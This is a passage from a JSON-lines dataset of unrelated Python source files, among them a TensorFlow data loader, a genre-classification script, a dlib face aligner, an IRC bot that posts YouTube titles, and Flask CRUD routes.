\"\"\"\n if file_path is None:\n print(\" Choose an input sound file...\")\n time.sleep(1)\n file_path = input_file()\n\n info_block(\"Reading audio file...\")\n t1 = time.time()\n\n # Handling file types\n _,_,ext = split_path(file_path)\n if ext != \"wav\":\n try:\n not_wav = pd.from_file(file_path, file_path.ext)\n not_wav.export(\".temp_soundfile.wav\", format=\"wav\")\n file_path = \".temp_soundfile.wav\"\n except FileNotFoundError:\n print(\" > unable to find file '{0}'\".format(file_path))\n print(\" > make sure to include .wav/.mp3/etc extension\")\n return self.read_file()\n \n # self.source_block[\"file\"] = file_path\n # Reading and Processing File\n try:\n self.arr, rate = sf.read(file_path)\n self.rate = Units.rate(rate)\n except RuntimeError:\n print(\" > unable to find or read '{0}'. Is that the correct extension?\".format(file_path))\n return self.read_file()\n try:\n os.remove(\".temp_soundfile.wav\")\n except FileNotFoundError:\n pass\n if len(self.arr.shape) < 2:\n self.arr = NpOps.stereoify(self.arr)\n t2 = time.time()\n info_line(\"sound file '{0}' read successfully in {1:.4f} seconds\".format(\n file_path, t2-t1))\n\n\n\nclass RelPublicObj(RelObject):\n \"\"\"\n methods to implement on classes that inherit from this:\n save (if any additional file saving needed beyond save_metadata)\n parse_write_meta (for save_metadata)\n rename (that calls super, and only handles renaming files)\n file_ref_repr (if not the standard name.reltype)\n validate_child_name\n pre_process and post_process\n \"\"\"\n\n def __init__(self, name, reltype, mode, **kwargs):\n\n super().__init__(name=name, reltype=reltype, **kwargs)\n\n if mode == \"create\":\n section_head(\"Initializing {0}\".format(reltype))\n elif mode == \"load\":\n info_line(\"Loading {0} '{1}'\".format(reltype, name))\n elif mode == \"prop\":\n # property\n pass\n else:\n raise UnexpectedIssue(\"Unknown mode '{0}'\".format(mode))\n\n self.name = name\n self.reltype = reltype\n\n self._do_aliases()\n\n def _do_aliases(self):\n \"\"\"\n add all aliases\n \"\"\"\n if not hasattr(self, \"_rel_data\"):\n self._rel_data = _ClsRelData()\n alias_map = self._rel_data.alias_map\n # copy to prevent modifying what we iterate over\n dct = {k:getattr(self, k) for k in dir(self)}\n for meth_name,method in dct.items():\n if has_aliases(method):\n for alias in get_reldata(method, \"aliases\"):\n if hasattr(self, alias) or alias in alias_map:\n raise NameError(\"Class '{0}' already has method/name '{1}' that cannot be aliases\".format(\n self.__class__.__name__, alias))\n alias_map[alias] = meth_name\n\n def get_process(self, name):\n \"\"\"\n handles getting aliases too\n \"\"\"\n # endswith to handle namespaced attr names\n if hasattr(self, name):\n return getattr(self, name)\n try:\n real_name = self._rel_data.alias_map[name]\n return getattr(self, real_name)\n except:\n raise AttributeError(\"Object '{0}' has not attribute '{1}'\".format(self, name))\n\n def get_all_public_method_names(self):\n \"\"\"\n get the names of all public methods\n \"\"\"\n return [func for func in dir(self) if is_public_process(getattr(self, func))]\n\n def get_all_public_methods(self):\n all_objs = [getattr(self, i) for i in dir(self)]\n return [i for i in all_objs if is_public_process(i)]\n\n def get_all_prop_names(self):\n from src.property import RelProperty\n return [i for i in dir(self) if \"__\" not in i and isinstance(getattr(self, i), RelProperty)]\n\n def parse_write_meta(self, attrs):\n \"\"\"\n override with super() call\n \"\"\"\n attrs = super().parse_write_meta(attrs)\n try:\n del attrs[\"edit_property\"]\n except KeyError: pass\n return attrs\n\n @public_process\n def property(self, prop_name):\n \"\"\"\n cat: property\n desc: edit a property\n args:\n property name: one of the following:\n dev: the possible args are generated in options on display\n \"\"\"\n all_prop_names = self.get_all_prop_names()\n if not all_prop_names:\n err_mess(\"This {0} has no properties to edit\".format(self.reltype))\n try:\n prop_name = autofill(prop_name, all_prop_names)\n except AutofillError as e:\n err_mess(\"This {0} has property named '{1}'\".format(self.reltype, e.word))\n else:\n # RelProp.process() method\n getattr(self, prop_name).process()\n\n @public_process\n def options(self):\n \"\"\"\n cat: info\n desc: list all process options that can be run on this object (shortcut 'o')\n \"\"\"\n nl()\n with style(\"cyan\"):\n info_block(\"{CATEGORY}\", indent=2)\n info_line(\"- {Process}\")\n info_line(\"{arguments in order, optional if in [square brackets]}\", indent=8)\n nl()\n\n meths = {}\n for mth in self.get_all_public_methods():\n cat = get_reldata(mth, \"category\")\n try:\n meths[cat].append(mth)\n except KeyError:\n meths[cat] = [mth]\n\n categories = list(meths.keys())\n # sort by category.value, which is the string representation of that category\n categories.sort(key=lambda x: x.value)\n for cat in categories:\n with style(\"cyan\"):\n info_line(cat.value.upper(), indent=2)\n for method in meths[cat]:\n method._rel_data.display()\n if cat == Category.PROPERTY:\n prop_names = self.get_all_prop_names()\n if not prop_names:\n info_line(\"(no properties to edit)\", indent=10)\n else:\n for i in prop_names:\n info_line(\"* \" + i, indent=10)\n\n @public_process\n def quit(self):\n \"\"\"\n cat: save\n desc: exit to parent process (shortcut 'q')\n dev: this is handled in input_processing\n \"\"\"\n # this is usually actually raised in process()\n raise Cancel\n\n\n\n\n\nclass SourceInfo(RelObject):\n \"\"\"\n class for saving source info\n \"\"\"\n\n def __init__(self, s_type, s_name, s_info=None):\n self.s_type = s_type\n self.s_name = s_name\n self.s_info = {} if s_info is None else s_info\n \n\n def show(self):\n \"\"\"\n like repr but prints directly\n \"\"\"\n info_line(\"Sourced from {0} '{1}':\".format(self.s_type, self.s_name))\n for k,v in self.s_info.items():\n info_list(\"{0}: {1}\".format(k,v))\n\n def set_info(self, info):\n \"\"\"\n set info from dict\n \"\"\"\n self.s_info.update(info)\n","sub_path":"src/rel_objects.py","file_name":"rel_objects.py","file_ext":"py","file_size_in_byte":19224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"332591537","text":"import os\nimport tensorflow as tf\nfrom helpers import get_record_path\n\n\nAUTOTUNE = tf.data.experimental.AUTOTUNE\n\n\ndef get_tfrecords(dataset_type, augmented):\n path = get_record_path(dataset_type, None, augmented)\n file_list = os.listdir(path)\n return [os.path.join(path, name) for name in file_list]\n\n\ndef decode(serialized_example, modal_type):\n features = tf.io.parse_single_example(\n serialized_example,\n features={\n 'height': tf.io.FixedLenFeature([], tf.int64),\n 'width': tf.io.FixedLenFeature([], tf.int64),\n 'depth': tf.io.FixedLenFeature([], tf.int64),\n 'bmode': tf.io.FixedLenFeature([], tf.string),\n 'pd': tf.io.FixedLenFeature([], tf.string),\n 'label': tf.io.FixedLenFeature([], tf.string)\n }\n )\n\n volume_shape = tf.stack([features['height'], features['width'], features['depth']])\n\n if modal_type == \"multi_modal\":\n bmode = tf.io.decode_raw(features['bmode'], tf.float32)\n bmode = tf.reshape(bmode, volume_shape)\n bmode = tf.expand_dims(bmode, axis=-1)\n bmode = tf.cast(bmode, tf.float32)\n\n pd = tf.io.decode_raw(features['pd'], tf.float32)\n pd = tf.reshape(pd, volume_shape)\n pd = tf.expand_dims(pd, axis=-1)\n pd = tf.cast(pd, tf.float32)\n\n input_vol = {\n \"input_1\": bmode,\n \"input_2\": pd\n }\n else:\n input_vol = tf.io.decode_raw(features[modal_type], tf.float32)\n input_vol = tf.reshape(input_vol, volume_shape)\n input_vol = tf.expand_dims(input_vol, axis=-1)\n input_vol = tf.cast(input_vol, tf.float32)\n\n label = tf.io.decode_raw(features['label'], tf.uint8)\n label = tf.reshape(label, volume_shape)\n label = tf.expand_dims(label, axis=-1)\n label = tf.cast(label, tf.uint8)\n\n return input_vol, label\n\n\ndef load_dataset(dataset_type, batch_size, num_epochs, modal_type, augmented=False):\n files = get_tfrecords(dataset_type, augmented)\n dataset = tf.data.TFRecordDataset(files)\n dataset = dataset.map(lambda x: decode(x, modal_type))\n dataset = dataset.batch(batch_size)\n if dataset_type == \"train\":\n dataset = dataset.repeat(num_epochs)\n return dataset.prefetch(buffer_size=AUTOTUNE)\n","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"635718987","text":"import os\nimport pandas as pd\nimport string\nimport nltk\nimport nltk.corpus\nfrom nltk.corpus import stopwords\nimport gensim\nfrom gensim import corpora, models\nfrom time import gmtime, strftime\nfrom collections import Counter\nimport itertools\nimport pyLDAvis\nimport pyLDAvis.gensim\nimport matplotlib.pyplot as plt\nfrom wordcloud import WordCloud\nimport pickle\n\n\n\n# ORGANIZES THREE SEPERATE CORPUS FOR INPUT DATA\ndef cmu_data_matrix(texts, tsv):\n\n \n with open(texts, encoding='utf-8') as text_file:\n lines = text_file.readlines()\n texto = [i.split('\\t') for i in lines]\n\n # resolve refrences \n text_dict = {int(iD):texts for iD, texts in texto }\n\n # initiate dataframe\n column_names = ['Wiki movie ID', 'Freebase movie ID', 'Movie Name', 'Movie release data', 'Movie box office', 'Movie runtime',\n 'Movie languages', 'Movie Countries', 'Movie Genres']\n \n #populate database\n movie_data_matrix = pd.read_csv(tsv, sep='\\t', names=column_names)\n movie_data_matrix['text'] = movie_data_matrix['Wiki movie ID'].map(text_dict)\n movie_data_matrix['genre_data'] =[set(eval(i.lower()).values()) for i in movie_data_matrix['Movie Genres']]\n \n print('Intial shape of data %s' %str(movie_data_matrix.shape))\n \n #filter by language and available texts\n movie_data_matrix_english=movie_data_matrix.loc[movie_data_matrix['Movie languages'].str.contains(\"english\", case=False)]\n print('Shape of data for english films %s' %str(movie_data_matrix_english.shape))\n matrix = movie_data_matrix_english.dropna(subset=['text'])\n print('Shape of data for english films with source text %s' %str(matrix.shape))\n \n corpus = matrix.text.tolist()\n print('Final size of corpus %s' %str(len(corpus)))\n \n #create genre_labels \n genre_distribution = Counter(itertools.chain(*matrix['genre_data']))\n del genre_distribution['drama']\n del genre_distribution['comedy'] \n \n matrix = matrix.dropna(subset=['genre_data'])\n \n \n matrix['labels'] = [sorted(list((genre_distribution[x],x) for x in genre), reverse=True)[:1]\n for genre in matrix['genre_data']]\n print('Shape of data for english films with source text and genre labels %s' %str(matrix.shape))\n\n matrix.to_csv('cmu_data.csv')\n \n return matrix\n\ndef film2_data_matrix():\n\n path = \"/Users/ViVeri/Desktop/ISO_Networks/imsdb_raw_nov_2015\"\n\n name = []\n filenames = []\n text = []\n\n for root, dirs, files in os.walk(path):\n for file in files:\n if file.endswith(\".txt\"):\n \n\n name.append(file)\n filenames.append(os.path.join(root, file))\n\n for i in filenames:\n with open(i) as inputfile:\n screenplay_raw = inputfile.read().strip('\\t\\n\\r')\n screenplay=' '.join(screenplay_raw.split())\n text.append(screenplay)\n \n \n\n\n labels =[os.path.dirname(i).split('/')[-1] for i in filenames]\n \n matrix =pd.DataFrame({'name':name, 'text': text, 'labels':labels})\n\n matrix.to_csv('film2_data.csv')\n\n print('Shape of data for Film2.0 corpus %s' %str(matrix.shape))\n\n return matrix\n \ndef tv_data_matrix():\n\n path = \"/Users/ViVeri/Desktop/ISO_Networks/tv_raw_2018\"\n\n name = []\n filenames = []\n text = []\n\n #access all files in tv corpus directory \n for root, dirs, files in os.walk(path):\n for file in files:\n if file.endswith(\".txt\"):\n \n name.append(file)\n filenames.append(os.path.join(root, file))\n\n #read all of those files and append to list\n for i in filenames:\n with open(i) as inputfile:\n text.append(inputfile.read().replace('\\t',\"\" ).replace('\\n', '').strip())\n \n\n\n show =[os.path.dirname(i).split('/')[-2] for i in filenames]\n season = [os.path.dirname(i).split('/')[-1] for i in filenames]\n episode_num=[i.split('.')[0] for i in name]\n\n \n matrix =pd.DataFrame({'title_episode':name, 'text': text, \n 'name':show, 'season':season, 'episode_num':episode_num})\n\n print('Shape of data for TV_corpus %s' %str(matrix.shape))\n\n matrix.to_csv('tv_data.csv')\n \n return matrix\n\ndef universe_of_discourse():\n\t\tC = cmu_data_matrix('plot_summaries.txt','movie.metadata.tsv')\n\t\tprint('CMU collected')\n\t\tF = film2_data_matrix()\n\t\tprint('Film2.0 collected')\n\t\tT = tv_data_matrix()\n\t\tprint('TV_2018 collected')\n\n\t\treturn C, F, T\n\n# RUN TO CREATE INTIAL FILES \n# x = universe_of_discourse()\n\n#RUN WHEN FILES ARE CREATED\ndef load_universe():\n\tC = pd.DataFrame.from_csv('cmu_data.csv')\n\tF = pd.DataFrame.from_csv('film2_data.csv')\n\tT = pd.DataFrame.from_csv('tv_data.csv')\n\n\treturn C, F , T\n\n# DELIVERS LIST OF CURATED STOP WORDS \n\n\n\n# Machine Learning MODEL \nfrom sklearn.model_selection import StratifiedKFold, StratifiedShuffleSplit, GridSearchCV\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn import linear_model, decomposition\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.linear_model import LogisticRegression\n\ndef stop_words():\n \n stop_words1 = stopwords.words('english')\n \n with open('name_stopwords.tsv') as text_file:\n stop_words2 = text_file.read().lower().replace(',', \" \").split()\n \n stop_words3 = [i.lower() for i in nltk.corpus.names.words()]\n \n stopwords_theta= set(stop_words1+stop_words2+stop_words3)\n \n return stopwords_theta\n\n\npipeline = Pipeline([\n ('tfidf', TfidfVectorizer(stop_words=stop_words()),\n ('clf', OneVsRestClassifier(LogisticRegression(solver='sag'))))])\n\nparameters = {\n 'tfidf__max_df': (0.25, 0.5, 0.75),\n 'tfidf__ngram_range': [(1, 1), (1, 2), (1, 3)],\n \"clf__estimator__C\": [0.01, 0.1, 1],\n \"clf__estimator__class_weight\": ['balanced', None],\n}\n\n\ndef train_test_split(data_matrix):\n\tdata_x = data_matrix[['text']].as_matrix()\n\tdata_y = data_matrix.drop(['name', 'text'], axis=1).as_matrix()\n\n\tstratified_split = StratifiedShuffleSplit(n_splits=2, test_size=0.33)\n\tfor train_index, test_index in stratified_split.split(data_x, data_y):\n\t x_train, x_test = data_x[train_index], data_x[test_index]\n\t y_train, y_test = data_y[train_index], data_y[test_index]\n\n\t# transform matrix of plots into lists to pass to a TfidfVectorizer\n\ttrain_x = [x[0].strip() for x in x_train.tolist()]\n\ttrain_y = [x[0].strip() for x in y_train.tolist()]\n\ttest_x = [x[0].strip() for x in x_test.tolist()]\n\ttest_y = [x[0].strip() for x in y_test.tolist()]\n\n\treturn train_x, train_y, test_x, test_y\n\n\ngrid_search_tune = GridSearchCV(\n pipeline, parameters, cv=2, n_jobs=2, verbose=3)\ngrid_search_tune.fit(train_x, train_y)\n\n\nprint(\"Best parameters set:\")\nprint (grid_search_tune.best_estimator_.steps)\n\n\n# measuring performance on test set\nprint (\"Applying best classifier on test data:\")\nbest_clf = grid_search_tune.best_estimator_\npredictions = best_clf.predict(test_x)\n\nprint (classification_report(test_y, predictions, target_names=labels))\n\n\n\n\n\n\n\n","sub_path":"ISO_Networks.py","file_name":"ISO_Networks.py","file_ext":"py","file_size_in_byte":7072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"192670508","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jul 6 03:45:40 2019\r\n\r\n@author: yasemin\r\n\"\"\"\r\n\r\nimport numpy as np\r\n\r\n\r\narray1 = np.array([[1,2], [3,4]])\r\narray2 = np.array([[-1,-2], [-3,-4]])\r\n\r\n# vertical şeklinde birleştirir:\r\n\r\narray3= np.vstack((array1,array2))\r\n\r\n# horizontal şeklinde birleştitir.\r\n\r\narray4 = np.hstack((array1,array2))","sub_path":"numpybasics/stackingArrays.py","file_name":"stackingArrays.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"430790041","text":"#!/usr/bin/python3\n\nfrom glob import glob\nimport sys\nimport re\n\naffix_tables = []\nfile_list = glob('/home/cyril/personal/kp-lemmatizer/txt/molodtsov_script/*.txt')\nfor file_name in file_list:\n for line in open(file_name):\n line = line.strip()\n if line:\n # print(line)\n affix_tables.append(line.split(\",\", 2))\n\nword_info = {}\nfor line in sys.stdin:\n for word in line.split():\n if word not in word_info:\n word_info[word] = []\n for [from_str,to_str,info] in affix_tables:\n (base, sub_num) = re.subn(from_str,to_str,word)\n if sub_num > 0:\n word_info[word].append({'info': info, 'base': base})\n \nprint(word_info)\n","sub_path":"src/lemmatizer.py","file_name":"lemmatizer.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"147681685","text":"from math import sqrt, ceil\r\ndef pz(s, n):\r\n\tl = len(s)\r\n\treturn '0' * (n-l) + s\r\n\r\ndef gen_coin(n):\r\n\tif n <= 2:\r\n\t\tyield '11'\r\n\t\treturn\r\n\tfor i in range(int('1'*(n-2), 2)+1):\r\n\t\tyield '1' + pz(bin(i)[2:], n-2) + '1'\r\n\r\n# def indx(i):\r\n# \tj = 0\r\n# \twhile i > soe[j]:\r\n# \t\tj+=1\r\n# \tif i == soe[j]:\r\n# \t\treturn j\r\n# \treturn -1\r\n\r\ndef prime(n, i=3):\r\n\t# try:\r\n\t# \ts = soe.index(i)+1\r\n\t# except:\r\n\t# \ts = 0\r\n\t# for i in range(s, len(soe)):\r\n\t# \tif n % soe[i] == 0:\r\n\t# \t\treturn i\r\n\t# return -1\r\n\tif n % 2 == 0:\r\n\t\treturn 2\r\n\tsqn = ceil(sqrt(n))\r\n\twhile i < sqn:\r\n\t\tif n % i == 0:\r\n\t\t\treturn i\r\n\t\ti += 2\r\n\treturn 0\r\n\r\ndef s_of_e(n):\r\n\ta = [1]*(n+1)\r\n\t# a = 2**(n+1)-1\r\n\t# i = 1\r\n\t# c = 0\r\n\t# cn = a+1\r\n\t# while i < cn:\r\n\t# \tif a & i:\r\n\t# \t\tj = i\r\n\t# \t\twhile j < n:\r\n\t# \t\t\ta = a & ~j\r\n\t# \t\t\tj <<= c\r\n\t# \ti <<= 1\r\n\t# \tc += 1\r\n\tfor i in range(2, int(sqrt(n+1))+1):\r\n\t\tif a[i]:\r\n\t\t\tfor j in range(i*i, n+1, i):\r\n\t\t\t\ta[j] = 0\r\n\tb = [i for i in range(2, n+1) if a[i]]\r\n\treturn a, b\r\n\r\nd = set()\r\n\r\ndef f(n, j, s=''):\r\n\tji = 0\r\n\tl1 = [0] * (j)\r\n\tg = gen_coin(n)\r\n\tif s:\r\n\t\twhile next(g) != s:\r\n\t\t\tpass\r\n\tji = 0\r\n\tfor i in g:\r\n\t\tl = []\r\n\t\tkl = []\r\n\t\t# print(i)\r\n\t\tfor m in range(2, 11):\r\n\t\t\tk = int(i, m)\r\n\t\t\tkl.append(k)\r\n\t\t\t# if soea[k]:\r\n\t\t\t# \tbreak\r\n\t\t\t# p = prime(k)\r\n\t\t\t# if p == -1:\r\n\t\t\t# \tbreak\r\n\t\t\tif k in d:\r\n\t\t\t\tbreak\r\n\t\t\tp = prime(k)\r\n\t\t\tif not p:\r\n\t\t\t\td.add(k)\r\n\t\t\t\tbreak\r\n\t\t\td.add(p)\r\n\t\t\tl.append(p)\r\n\t\telse:\r\n\t\t\t# print(i)\r\n\t\t\tif ji >= len(l1):\r\n\t\t\t\tbreak\r\n\t\t\tprint(i, end=' ')\r\n\t\t\tfor j in l:\r\n\t\t\t\tprint(j, end=' ')\r\n\t\t\tprint()\r\n\t\t\t# for j in kl:\r\n\t\t\t# \tprint(j, end=' ')\r\n\t\t\t# print()\r\n\t\t\tl1[ji] = [i] + l\r\n\t\t\tji += 1\r\n\t\tif ji != j:\r\n\t\t\tpass\r\n\t\telse:\r\n\t\t\tbreak\r\n\treturn l1\r\n\r\nt = input()\r\nn, j = input().split()\r\nn = int(n)\r\nj = int(j)\r\n# g = input()\r\n# print(n, j)\r\n# soea, soe = s_of_e(int('1'*n))\r\n# soe.append(int('1'*n))\r\nprint(\"Case #1:\")\r\nl = f(n, j)\r\n# print(l)\r\n# for i in l:\r\n# \tfor j in i:\r\n# \t\tprint(j, end=' ')\r\n# \tprint()\r\n","sub_path":"codes/CodeJamCrawler/16_0_3/shreyash14s/coin_jam.py","file_name":"coin_jam.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"456746025","text":"import cv2\nfrom align_dlib import AlignDlib\nfrom imutils.face_utils import rect_to_bb\nimport dlib\n\nfaceWidth = 360\nfaceLandmarkModel = \"shape_predictor_68_face_landmarks.dat\"\ntestimgPath = \"IMG_7492.jpg\"\n\nimage = cv2.imread(testimgPath)\nalign_dlib = AlignDlib(faceLandmarkModel)\nbbs = align_dlib.getAllFaceBoundingBoxes(image)\ndetector = dlib.get_frontal_face_detector()\n\ni = 0\nfor bb in bbs:\n aligned = align_dlib.align(faceWidth, image, bb, landmarkIndices=AlignDlib.INNER_EYES_AND_BOTTOM_LIP, scale=0.5)\n if aligned is not None:\n aligned = cv2.cvtColor(aligned, cv2.COLOR_BGR2RGB)\n gray = cv2.cvtColor(aligned, cv2.COLOR_BGR2GRAY)\n rectB = detector( gray , 2)\n \n for rectFinal in rectB:\n (x2, y2, w2, h2) = rect_to_bb(rectFinal)\n print((x2, y2, w2, h2))\n face2 = aligned[y2:y2 + h2, x2:x2 + w2]\n face2 = face2[...,::-1]\n\n cv2.imwrite(\"dlibface-\" + str(i) + \".jpg\", face2)\n i += 1\n #cv2.imwrite(\"dlibface-\" + str(i) + \".jpg\", aligned)\n #i += 1\n","sub_path":"face-align/facealign_dlib.py","file_name":"facealign_dlib.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"618606213","text":"'''\n문제 제목: 크로아티아 알파벳\n시도 횟수: 1\n실패 사유: X\n원인: X\n결과: 이중 반복문을 통해 좀(?) 복잡하게 문제를 풀었다.\n다른 사람의 코드를 보니 'in' 과 같은 속성을 사용하여 단일반복문으로 실행이 되는 것을 보고\n충격먹었다. in 사용법에 대해 잘 모르고있었는데 다시금 배우게 됐다..ㅎ;;\n'''\ncroatia = ['c=', 'c-', 'dz=', 'd-', 'lj', 'nj', 's=', 'z=']\n\n\ndef lenCroatian(alphabet):\n index = 0\n length = 0\n while(alphabet != ''):\n for i in croatia:\n # 크로아티아 2자리 알파벳일 경우\n if i != 2 and alphabet[index:index+2] == i:\n length += 1\n # 알파벳 말미까지 확인한 경우 None으로 값을 바꾸고,\n # 아닌경우에는 다음 인덱스부터를 알파벳으로 설정\n alphabet = alphabet[index+2:]\n break\n # 크로아티아 3자리 알파벳일 경우\n elif alphabet[index:index+3] == i:\n length += 1\n alphabet = alphabet[index+3:]\n break\n # 크로아티아 알파벳이 아닌 경우\n elif i == 'z=':\n length += 1\n alphabet = alphabet[index+1:]\n break\n return length\n\n\nstring = input()\nprint(lenCroatian(string))\n","sub_path":"2941.py","file_name":"2941.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"475952575","text":"#!/usr/bin/python\nfrom googleapiclient.discovery import build\nimport functools\nimport isodate\nimport logging\nimport interface\nimport asyncio\nimport irc3\nimport yaml\nimport os\nimport re\nimport random\n\n\n@irc3.plugin\nclass MyClient(object):\n\n def __init__(self, bot):\n self.bot = bot\n self.nick = self.bot.get_nick()\n config_path = os.path.join(os.path.dirname(__file__),\n '../conf/bots.yaml')\n self.config = yaml.load(open(config_path).read())\n self.commands = self.config.get('common_actions', {})\n self.commands.update(self.config.get('irc_actions', {}))\n self.commands.update(self.config.get('admin_actions', {}))\n self.url_enabled_channels = self.config.get('youtube', {}).get(\n 'url_enabled_channels', []\n )\n self.interface = interface.Interface(self.config, self.commands)\n self.youtube_regex = '(?:https?://)?(?:www.)?(?:youtube.com|youtu.be)/(?:watch\\?)?(?:v=)?([^\\s]+)'\n self.build_youtube_service()\n self.db = open(\"links.csv\", \"a\", buffering=1, encoding=\"utf8\")\n\n def build_youtube_service(self):\n try:\n self.service = build(\n 'youtube', 'v3', \n developerKey=self.config['youtube']['api_key'])\n except KeyError:\n logging.info('Starting without youtube service')\n self.service = None\n \n async def send_message(self, channel, message):\n '''\n Async send method to maintain compatibility\n with discord format.\n '''\n await self.bot.privmsg(channel, message)\n\n @irc3.event(irc3.rfc.PRIVMSG)\n async def on_privmsg(self, mask, data, target, **kw):\n '''\n irc3 method thats called everytime there is a message.\n Doesn't do anything except pass it on to method that\n actually handles it.\n args:\n mask: user\n data: message\n target: channel\n '''\n await self.handle_message(mask, data, target)\n\n async def check_url_parsing(self, user, msg, channel):\n if channel in self.url_enabled_channels:\n match_obj = re.search(self.youtube_regex, msg)\n if match_obj:\n title = await self.return_youtube_title(channel, match_obj.group(1))\n nick = user.split(\"!\")[0]\n self.db.write(\"%s;%s;%s;%s\\n\" % (nick, channel, match_obj.group(1), title))\n\n async def return_youtube_title(self, channel, video_id):\n if self.service:\n result = await asyncio.get_event_loop().run_in_executor(\n None, functools.partial(self.perform_youtube_request, video_id)\n )\n if result:\n msg = 'YouTube: %s (%s)' % result\n await self.send_message(channel, msg)\n return result[0]\n\n def perform_youtube_request(self, video_id):\n try:\n result = self.service.videos().list(\n part='snippet, contentDetails',id=video_id\n ).execute()['items'][0]\n title = result['snippet']['title']\n duration = isodate.parse_duration(result['contentDetails']['duration'])\n mins = int(duration.seconds/60)\n seconds = int(duration.seconds - mins * 60)\n return(title, '%s:%s' % (mins, seconds))\n # Pokemon exception catching because we dont care as much about parsing\n # youtube titles.\n except Exception:\n logging.exception('failed to obtain youtube title')\n return None\n\n async def handle_message(self, user, msg, channel):\n '''\n Main method that determines how a received message is handled.\n '''\n # Don't bother doing anything with msgs sent by us.\n if self.nick != user[:len(self.nick)]:\n # Only bother with non private msgs.\n if channel != self.nick:\n await self.check_url_parsing(user, msg, channel)\n for command in self.commands.keys():\n if msg.lower().startswith(command.lower()):\n if random.random() > 0.95:\n response = \"J'ai pas envie de faire ça %s!\" % self.nick\n break\n msg = msg[len(command):].strip()\n command = command.lower()\n response = await self.interface.call_command(command,\n msg, user,\n channel,\n self)\n\n if response:\n if isinstance(response, tuple):\n response, _ = response\n await self.send_message(channel, response)\n break\n\ndef main():\n config = dict(nick=\"botanic\", autojoins=[\"#vegan\"], host=\"irc.europnet.org\",\n port=6667, ssl=False, human=\"quotes.txt\", includes=['irc3.plugins.core',\n 'irc3.plugins.command', 'irc3.plugins.human', __name__])\n bot = irc3.IrcBot.from_config(config)\n bot.run(forever=True)\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/irc-bot.py","file_name":"irc-bot.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"346128746","text":"from flask import render_template, flash, session, redirect, url_for, current_app, request\nfrom .. import db\nfrom ..models import School, Student, City, Agent\n#from ..email import send_email\nfrom . import main\nfrom .forms import SchoolForm, StudentForm, CityForm, AgentForm\n\n\n@main.route('/', methods=['GET', 'POST'])\ndef index():\n form = StudentForm()\n fshenqing = Student.query.filter_by(shenqing='Early Decision')\n\n return render_template('index.html', form=form, fshenqing=fshenqing)\n\n\n@main.route('/test')\ndef test():\n return render_template('test.html')\n\n@main.route('/city', methods=['GET', 'POST'])\ndef city():\n form = CityForm()\n if form.validate_on_submit():\n if form.id.data is None:\n info = City(guojia=form.guojia.data,\n zhou=form.zhou.data,\n chengshi=form.chengshi.data,\n renkou=form.renkou.data,\n mianji=form.mianji.data,\n zhuanye1=form.zhuanye1.data,\n zhuanye2=form.zhuanye2.data,\n zhuanye3=form.zhuanye3.data)\n else:\n info = City.query.get(form.id.data)\n info.guojia=form.guojia.data\n info.zhou=form.zhou.data\n info.chengshi=form.chengshi.data\n info.renkou=form.renkou.data\n info.mianji=form.mianji.data\n info.zhuanye1=form.zhuanye1.data\n info.zhuanye2=form.zhuanye2.data\n info.zhuanye3=form.zhuanye3.data\n db.session.add(info)\n flash('数据提交成功!')\n return redirect(url_for('.cityl'))\n cityid = request.args.get('id')\n delc = request.args.get('del')\n if cityid is None:\n form = CityForm(renkou=0, mianji=0)\n return render_template('city.html', form=form)\n if delc == '1':\n editdef = City.query.get(cityid)\n db.session.delete(editdef)\n db.session.commit()\n flash('id=%s 数据删除成功!' %cityid)\n return redirect(url_for('.cityl'))\n else:\n editdef = City.query.get(cityid)\n form.id.data = editdef.id\n form.guojia.data = editdef.guojia\n form.zhou.data = editdef.zhou\n form.chengshi.data = editdef.chengshi\n form.renkou.data = editdef.renkou\n form.mianji.data = editdef.mianji\n form.zhuanye1.data = editdef.zhuanye1\n form.zhuanye2.data = editdef.zhuanye2\n form.zhuanye3.data = editdef.zhuanye3\n return render_template('city.html', form=form)\n\n\n@main.route('/cityl')\ndef cityl():\n citys = City.query.order_by(City.id.desc()).all()\n return render_template('citylist.html', citys=citys)\n\n\n@main.route('/agent', methods=['GET', 'POST'])\ndef agent():\n form = AgentForm()\n if form.validate_on_submit():\n if form.id.data is None:\n info = Agent(name=form.name.data,\n url=form.url.data,\n logo=form.logo.data,\n jianjie=form.jianjie.data,\n weizhi=form.weizhi.data,\n address=form.address.data)\n else:\n info = Agent.query.get(form.id.data)\n info.name=form.name.data\n info.url=form.url.data\n info.logo=form.logo.data\n info.jianjie=form.jianjie.data\n info.weizhi=form.weizhi.data\n info.address=form.address.data\n db.session.add(info)\n flash('数据提交成功!')\n return redirect(url_for('.agentl'))\n Agentid = request.args.get('id')\n delc = request.args.get('del')\n if Agentid is None:\n form = AgentForm()\n return render_template('agent.html', form=form)\n if delc == '1':\n editdef = Agent.query.get(Agentid)\n db.session.delete(editdef)\n db.session.commit()\n flash('id=%s 数据删除成功!' %Agentid)\n return redirect(url_for('.agentl'))\n else:\n editdef = Agent.query.get(Agentid)\n form.id.data = editdef.id\n form.name.data = editdef.name\n form.url.data = editdef.url\n form.logo.data = editdef.logo\n form.jianjie.data = editdef.jianjie\n 